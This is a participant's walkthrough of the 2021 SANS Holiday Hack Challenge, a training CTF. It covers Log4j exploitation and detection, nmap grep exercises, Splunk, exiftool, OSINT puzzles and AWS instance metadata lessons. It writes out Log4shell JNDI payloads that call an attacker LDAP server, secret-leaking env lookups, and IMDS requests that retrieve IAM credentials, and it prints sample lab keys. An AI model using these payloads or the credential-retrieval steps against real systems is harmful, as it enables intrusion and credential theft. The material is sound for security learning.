2021 SANS Holiday Hack Challenge & KringleCon

Dec 2021 - 7 Jan 2022

This annual Christmas-themed CTF by SANS is in game format: players help Santa defeat cybersecurity villains and save the holiday season. Once logged in, you are greeted by elves in the snow.

There are two walkthroughs on the recent Log4j vulnerability: 'Bonus! Blue Log4Jack' lets players understand what the vulnerability is about, and 'Bonus! Red Log4Jack' shows how attackers exploit it.

Bonus! Red Log4Jack

Covering the Red team first, as it's a lot shorter. SANS instructor Josh Wright has uploaded his solution for the Log4Jack exploitation at https://gist.github.com/joswr1ght/fb361f1f1e58307048aae5c0f38701e4.

After running through his instructions, the final screen with the answer is shown below.

Bonus! Blue Log4Jack

Follow the guided instructions for the Blue Team and learn along the way!

The Log4j library is valuable for producing consistent logging messages that can be handled flexibly. Unfortunately, multiple vulnerabilities allow attackers to manipulate this functionality in many versions of Log4j 2 before version 2.17.0.

The CVE-2021-44228 Log4j vulnerability is from improper input validation. Log4j includes support for lookup features, where an attacker can supply input that retrieves more data than intended from the system. Re-run the prior Java command, replacing testfile2.txt with the string '${java:version}'
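
Re-running the command presumably looks like the following (DisplayFilev2 is the sample program used later in this lesson):

java DisplayFilev2 '${java:version}'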

Notice how the error has changed - instead of a file name, the error shows the Java version information. The Log4j lookup command java:version retrieves information from the host OS. Let's try another example: re-run the last command, changing the java:version string to env:APISECRET.
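
Swapping in the env lookup, the re-run would be along these lines:

java DisplayFilev2 '${env:APISECRET}'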

Using the Log4j env lookup, attackers can access local environment variables, possibly disclosing secrets like this one. Log4j also supports lookup requests using the Java Naming and Directory Interface (JNDI). These requests can reach out to an attacker server to request data.

Log4j lookups can also tell the vulnerable server to contact the attacker using LDAP and DNS. Run the startserver.sh command to launch a simple server for testing purposes.

The bottom window is waiting for a connection at the specified IP address and port. Re-run the DisplayFilev2 program, using the Log4j lookup to connect to the server: java DisplayFilev2 '${jndi:ldap://127.0.0.1:1389/Exploit}'

Notice how the server received a connection from the vulnerable application in the server ("Connection received")? This is a critical part of the Log4j vulnerability, where an attacker can force a server to connect to an attacking system to exploit the vulnerability. Press CTRL+C to close the DisplayFilev2 program and continue with this lesson.

To address this vulnerability, applications need an updated version of Log4j. Change to the ~/patched directory by running 'cd ~/patched'

This is the same DisplayFilev2.java source, but the Log4j library is updated to a patched version. To use the updated library, change the Java CLASSPATH variable by running 'source classpath.sh'

Compile the DisplayFilev2.java source using the patched Log4j library. Run 'javac DisplayFilev2.java'

Use the Log4j lookup string java:version by running the following command: java DisplayFilev2 '${java:version}'

With the fixed Log4j library, attackers can't use the lookup feature to exploit the library. The same program displays the ${java:version} lookup as a literal string, without performing the actual lookup. Next, we'll look at a technique to scan applications for the vulnerable Log4j library. Run 'cd' to return to the home directory.

The log4j2-scan utility is a tool to scan for vulnerable Log4j application use. Run the log4j2-scan utility, specifying the vulnerable directory as the first command-line argument.
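
Assuming the directory is simply named vulnerable, as the lesson implies, the invocation is something like the following (the next step is the same command with patched as the argument):

log4j2-scan vulnerable/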

Log4j2-scan quickly spots the vulnerable version of Log4j. Repeat this command, changing the search directory to patched.

Log4j2-scan can also scan large directories of files. This server includes the Apache Solr software that uses Log4j in the /var/www/solr directory. Scan this directory with log4j2-scan to identify if the server is vulnerable.
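
The same tool, pointed at the Solr install:

log4j2-scan /var/www/solr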

Log4j2-scan finds two vulnerable Log4j libraries: one for the Solr platform, and one for a third-party plugin. Both need to be patched to resolve the vulnerability. Next, we'll look at scanning system logs for signs of Log4j attack.

The CVE-2021-44228 Log4j exploit using JNDI for access is known as Log4shell. It uses the JNDI lookup feature to manipulate logs, gain access to data, or run commands on the vulnerable server. Web application servers are a common target. Let's scan the web logs on this server. Examine the files in the /var/log/www directory.

We can scan web server logs to find requests that include the Log4j lookup syntax using a text pattern matching routine known as a regular expression. Examine the contents of the logshell-search.sh script using 'cat'
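
The script itself isn't reproduced here, but its core is presumably a recursive grep for the JNDI lookup syntax, something along these lines (my approximation, not the actual file contents):

# hypothetical sketch of logshell-search.sh
grep -riE '\$\{jndi:(ldap|ldaps|rmi|dns)' "$1"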

This script recursively searches for Log4shell attack syntax in any files. Run the logshell-search.sh command, specifying the /var/log/www directory as the search target.

In this output we see three examples of the Log4shell attack. Let's look at each line individually. Re-run the previous command, piping the output through sed '1!d' to focus on the first line.
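
The pipeline for each line looks like this (swap in '2!d' and '3!d' for the later lines):

./logshell-search.sh /var/log/www | sed '1!d'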

In this first attack, we see the attacker is at 10.26.4.27. The Log4j lookup command is sent as a URL GET parameter, attempting to use JNDI to reach the attacker's LDAP server at ldap://10.26.4.27:1389 (seen in the ${jndi:ldap://10.26.4.27:1389/Evil} string). Re-run the previous command, this time looking at the 2nd line of output.

In this second attack, we see the attacker is at 10.99.3.1. Instead of a URL GET parameter, this time the exploit is sent through the browser User-Agent field. The attacker attempted to use JNDI to reach the attacker DNS server at dns://10.99.3.43, using a different IP than the exploit delivery address. Re-run the previous command, this time looking at the 3rd line of output.

Here we see the attacker is at 10.3.243.6. This attack is also sent through the browser User Agent field, but this more closely resembles the first attack using the attacker LDAP server at 10.3.243.6. The DefinitelyLegitimate string is supplied by the attacker, matching a malicious Java class on the LDAP server to exploit the victim Log4j instance. Run 'next' to continue.

🍬🍬🍬🍬Congratulations!🍬🍬🍬🍬 You've completed the lesson on Log4j vulnerabilities. Run 'exit' to close.

Grepping for Gold

Talk to Greasy Gopherguts at the Frost Tower.

Question 1: What port does 34.76.1.22 have open?
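
A quick grep against the scan output (bigscan.gnmap, per the next question) answers this:

grep "34.76.1.22 " bigscan.gnmap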

Question 2: What port does 34.77.207.226 have open? Run the same command to search the bigscan.gnmap file.

Question 3: How many hosts appear "Up" in the scan?
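
Each live host gets a "Status: Up" line in the .gnmap output, so counting those lines gives the total (26,054, as used in question 5 below):

grep -c "Status: Up" bigscan.gnmap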

Question 4: How many hosts have a web port open? (Let's just use TCP ports 80, 443, and 8080).
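
One way to count this is to match hosts whose Ports entry has any of the three ports in an open state; each matching line is one host. A sketch (the leading character class keeps, say, 5080 from matching as 80):

grep -E "[ :](80|443|8080)/open/tcp" bigscan.gnmap | wc -l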

Question 5: How many hosts with status Up have no (detected) open TCP ports?

The answer from question 3 was 26,054 hosts with status Up. Subtracting the number of Up hosts that have at least one open TCP port from that total leaves 402 hosts with no detected open TCP ports.
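
In command form, a sketch of the arithmetic:

# hosts reported Up: 26,054
grep -c "Status: Up" bigscan.gnmap

# Up hosts with at least one open TCP port: 25,652
grep "/open/tcp/" bigscan.gnmap | wc -l

# 26,054 - 25,652 = 402 hosts Up with no detected open TCP ports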

Question 6: What's the greatest number of TCP ports any one host has open?

Count the hosts with open TCP ports by running grep -E "(/open/tcp//.*)" bigscan.gnmap | wc -l. This shows that 25,652 lines (hosts) in the file have at least one open TCP port. Next, use trial and error to narrow down the largest number of TCP ports any single host has open, repeating the pattern until the result shows 0.
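
As a sketch, repeat the group N times and raise N until the count hits zero; the largest N that still returns matches is the answer (12 here is just an example repetition count):

grep -E "(/open/tcp//.*){12}" bigscan.gnmap | wc -l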

Thaw Frost Tower's Entrance

Find Grimy McTrollkins standing at the Frost Tower entrance.

Scan for Wi-Fi networks and wlan0 shows up. Search the manual for iwconfig to learn how to connect to the network; the man page shows the syntax iwconfig eth0 essid "My Network". After connecting to the network, complete the setup with curl against the website provided and gain access to the 'Nidus Thermostat Setup'.
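
Roughly, the steps were (the SSID is a placeholder for whatever the scan shows, and the setup URL is assumed from the later registration steps):

# list nearby Wi-Fi networks on the wireless interface
iwlist wlan0 scan

# associate with the open network found in the scan
iwconfig wlan0 essid "<SSID from the scan>"

# then pull up the Nidus Thermostat Setup page
curl http://nidus-setup:8080/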

Next, try registering the Thermostat with the command curl http://nidus-setup:8080/register but the image does not show any numbers.

Since the registration doesn't work, and the instructions said to adjust the temperature for frostbite protection, connect to the API using curl http://nidus-setup:8080/apidoc.

The only available API endpoint to interact with is the cooler. Running the command below causes a meltdown and the challenge is completed!
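
Based on the apidoc, the cooler endpoint takes a JSON temperature change via POST; the request was along these lines (header and payload format per the apidoc, with the amount chosen to drive the temperature down hard):

curl -XPOST -H 'Content-Type: application/json' --data-binary '{"amount": -500}' http://nidus-setup:8080/api/cooler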

Moving to Santa's Hall, Fitzy Shortstack is there with his Yara Analysis problem.

First, check what files are on the system, then run the_critical_elf_app to see which rule is the problem; it reports 'yara_rule135'. Change to the yara_rules directory to see what that rule is.
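
The commands for this step, roughly (invocation paths assumed):

# list what's on the system, run the app, then inspect the flagged rule
ls
./the_critical_elf_app
cd yara_rules && cat rules.yar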

Next, the strings and condition need to be edited to tell the sweetness level of the candy. Running vim rules.yar opens the file, but googling about Yara rules doesn't help me solve this question, as I am lost when it comes to writing Yara rules or programming.

Visit Angel Candysalt for Splunk challenges.

Task 1: Capture the commands Eddie ran most often, starting with git. Looking only at his process launches as reported by Sysmon, record the most common git-related CommandLine that Eddie seemed to use.

Under CommandLine, 'git status' is the most commonly used command after 'docker ps'.
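
A search along these lines surfaces it (the sourcetype, source, and field names here are my assumptions about the lab's Sysmon-for-Linux data, not copied from the challenge):

index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=1 CommandLine="*git*"
| stats count by CommandLine
| sort - count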

Task 2: Looking through the git commands Eddie ran, determine the remote repository that he configured as the origin for the 'partnerapi' repo. The correct one!

Search for the partnerapi repo: index=main sourcetype=ghe_audit_log_monitoring repository="elfnp3/partnerapi"

Lost on me here.. Can't find the answer

Moved on to Piney Sappington for Exif Metadata. OSINT senses tingling and ready for a challenge!

First, examine the current directory and the files in it. There is a list of 20 different files, and exiftool will help determine when, and by whom, each file was last modified.

Run the command exiftool /home/elf/ | grep -B 45 "Jack Frost" to examine all the files in the current directory /home/elf, grepping for the 45 lines before each "Jack Frost" match (20 lines was tried first, but the file name wasn't visible). The modified file is shown to be 2021-12-21.docx.

Tangle Coalbox is also at the Courtyard of Sponsors page. The challenge here is Caramel Santaigo. And another OSINT challenge!

Investigate the 3 clues:

  1. They said something about MGRS and 32U NU 05939 98268...

  2. Apparently they really wanted to see what a town hall looks like when it's converted into a giant Advent calendar!

  3. They were dressed for 7.0°C and partly cloudy conditions. The elf got really heated about using tabs for indents.

The first clue mentions MGRS, the Military Grid Reference System. A quick Google search leads to https://legallandconverter.com/p50.html, and keying in the grid reference '32U NU 05939 98268' points to Stuttgart.

The second clue talks about a giant Advent calendar; a quick search shows that the Gengenbach Town Hall is the venue in question.

Depart by sleigh to Stuttgart, where the next question is:

Stuttgart has been celebrating Christmas since 1692. Even the rooftops get decorated. And where else does the side of the town hall become a giant Advent calendar?

The 3 clues are:

  1. I think they left to check out the Défilé de Noël.

  2. They called me and mentioned they were connected via Rogers Wireless.

  3. They were dressed for 0.0°C and fog conditions. Oh, I noticed they had a Firefly themed phone case.

The first clue leads us to another name for the 'Défilé de Noël': the Santa Claus parade. The second clue about 'Rogers Wireless' shows that it is a Canadian telecommunications company headquartered in Toronto. Moving on, depart by sleigh to Montreal, Canada.

The next 3 clues are:

  1. I've heard that when British children put letters to Father Christmas in the fireplace, they magically end up there!

  2. They just contacted us from an address in the 80.95.128.0/20 range.

  3. They were dressed for -12.0°C and sunny conditions. The elf mentioned something about Stack Overflow and Golang.

Zooming in on the second clue, the IP range turns out to be in Vammala, Finland. Moving on to the next destination, Rovaniemi, Finland.

Clues:

  1. Buddy, a close friend of the elves, once went on an ice skating date under their huge Christmas tree!

  2. They sent me this blurry selfie of themself or someone they met:

  3. They were dressed for 10.6°C and mist conditions. Oh, I noticed they had a Doctor Who themed phone case.

Visit InterRink to key in all the clues and find the elf.

Oh, but the challenge is not solved yet... Poking around shows that this part is not about OSINT but about Flask cookies! There is a link to https://gist.github.com/chriselgee/b9f1861dd9b99a8c1ed30066b25ff80b showing what the cookie looks like. However, examining the developer console does not show the cookie at all.
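
For reference, the linked gist covers decoding Flask session cookies; one way to do that locally is the flask-unsign tool (the cookie value below is a placeholder, since I never located the actual cookie):

pip install flask-unsign
flask-unsign --decode --cookie '<session cookie value>'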

Enter Jack's Office Bathroom to find Noxious O. D'ar and the Instance Metadata Service (IMDS) challenge.

🎄🎄🎄 Prof. Petabyte here. In this lesson you'll continue to build your cloud asset skills, interacting with the Instance Metadata Service (IMDS) using curl. 🎄🎄🎄

The Instance Metadata Service (IMDS) is a virtual server for cloud assets at the IP address 169.254.169.254. Send a couple ping packets to the server.

ping -c 4 169.254.169.254

IMDS provides information about currently running virtual machine instances. You can use it to manage and configure cloud nodes. IMDS is used by all major cloud providers. Run 'next' to continue.

next

Developers can automate actions using IMDS. We'll interact with the server using the cURL tool. Run 'curl http://169.254.169.254' to access IMDS data.

curl http://169.254.169.254

latest

Different providers will have different formats for IMDS data. We're using an AWS-compatible IMDS server that returns 'latest' as the default response. Access the 'latest' endpoint. Run 'curl http://169.254.169.254/latest'

curl http://169.254.169.254/latest

dynamic

meta-data

IMDS returns two new endpoints: dynamic and meta-data. Let's start with the dynamic endpoint, which provides information about the instance itself. Repeat the request to access the dynamic endpoint: 'curl http://169.254.169.254/latest/dynamic'.

curl http://169.254.169.254/latest/dynamic

fws/instance-monitoring

instance-identity/document

instance-identity/pkcs7

instance-identity/signature

Much of the data retrieved from IMDS will be returned in JavaScript Object Notation (JSON) format. Piping the output to 'jq' will make the content easier to read. Re-run the previous command, sending the output to JQ: 'curl http://169.254.169.254/latest/dynamic/instance-identity/document | jq'

In addition to dynamic parameters set at launch, IMDS offers metadata about the instance as well. Examine the metadata elements available: 'curl http://169.254.169.254/latest/meta-data'

curl http://169.254.169.254/latest/meta-data

By accessing the metadata elements, a developer can interrogate information about the system. Take a look at the public-hostname element: 'curl http://169.254.169.254/latest/meta-data/public-hostname'

Many of the data elements returned won't include a trailing newline, which causes the response to blend into the prompt. Re-run the prior command, adding '; echo' to the end of the command. This will add a new line character to the response.

curl http://169.254.169.254/latest/meta-data/public-hostname; echo

ec2-192-0-2-54.compute-1.amazonaws.com

There is a whole lot of information that can be retrieved from the IMDS server. Even AWS Identity and Access Management (IAM) credentials! Request the endpoint 'http://169.254.169.254/latest/meta-data/iam/security-credentials' to see the instance IAM role.

curl http://169.254.169.254/latest/meta-data/iam/security-credentials

elfu-deploy-role

Once you know the role name, you can request the AWS keys associated with the role. Request the endpoint 'http://169.254.169.254/latest/meta-data/iam/security-credentials/elfu-deploy-role' to get the instance AWS keys.

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/elfu-deploy-role

{
  "Code": "Success",
  "LastUpdated": "2021-12-02T18:50:40Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "AKIA5HMBSK1SYXYTOXX6",
  "SecretAccessKey": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",
  "Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",
  "Expiration": "2026-12-02T18:50:40Z"
}

So far, we've been interacting with the IMDS server using IMDSv1, which does not require authentication. Optionally, AWS users can turn on IMDSv2 that requires authentication. This is more secure, but not on by default. Run 'next' to continue.

next

For IMDSv2 access, you must request a token from the IMDS server using the X-aws-ec2-metadata-token-ttl-seconds header to indicate how long you want the token to be used for (between 1 and 21,600 seconds). Examine the contents of the 'gettoken.sh' script in the current directory using 'cat'.

cat gettoken.sh

TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

This script will retrieve a token from the IMDS server and save it in the environment variable TOKEN. Import it into your environment by running 'source gettoken.sh'.

Now, the IMDS token value is stored in the environment variable TOKEN. Examine the contents of the token by running 'echo $TOKEN'.

echo $TOKEN

gYVa2GgdDYbR6R4AFnk5y2aU0sQirNIIoAcpOUh/aZk=

With the IMDS token, you can make an IMDSv2 request by adding the X-aws-ec2-metadata-token header to the curl request. Access the metadata region information in an IMDSv2 request: 'curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/placement/region'

curl -H "X-aws-ec2-metadata-token: gYVa2GgdDYbR6R4AFnk5y2aU0sQirNIIoAcpOUh/aZk=" http://169.254.169.254/latest/meta-data/placement/region

🍬🍬🍬🍬Congratulations!🍬🍬🍬🍬 You've completed the lesson on Instance Metadata interaction. Run 'exit' to close.
